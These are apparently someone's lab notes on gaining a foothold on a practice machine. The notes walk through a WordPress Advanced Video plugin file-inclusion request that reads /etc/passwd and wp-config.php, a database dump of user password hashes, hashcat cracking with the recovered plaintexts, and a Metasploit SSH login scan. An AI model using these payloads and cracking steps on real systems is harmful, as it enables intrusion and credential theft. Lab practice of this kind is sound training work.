Foothold

https://192.168.172.148:12380/blogblog/wp-content/plugins/192.168.172.148

WP plugin LFI

WordPress Plugin Advanced Video 1.0 - Local File InclusionExploit Database

LFI that puts the contents of a file into the thumbnail of a post. Got to hyped with this exploitation path

searchsploit -m 39646

GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=69&short=rnd&term=rnd&thumb=../../../../../../../../../../../etc/passwd

https://192.168.172.148:12380/blogblog/?p=31

wget https://red.initech:12380/blogblog/wp-content/uploads/159376920.jpeg --no-check-certificate

GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=69&short=rnd&term=rnd&thumb=../wp-config.php HTTP/1.1

Using Wordpress creds to ssh into machine

root:plbkac

use wordpress
show tables;
select user_login, user_pass from wp_users;

John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.
Elly:$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
Dave:$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
Simon:$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
Abby:$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0

hashcat -m 400 --user wordpress.hashes ~/rockyou.txt -O

garry:football
harry:monkey
scott:cookie
kathy:coolgirl
John:incorrect
barry:washere
tim:thumb
Pam:0520

msfconsole
use auxiliary/scanner/ssh/ssh_login

JBare:cookie
LSolum:incorrect

Previous12380 NextEnumeration

Last updated 1 year ago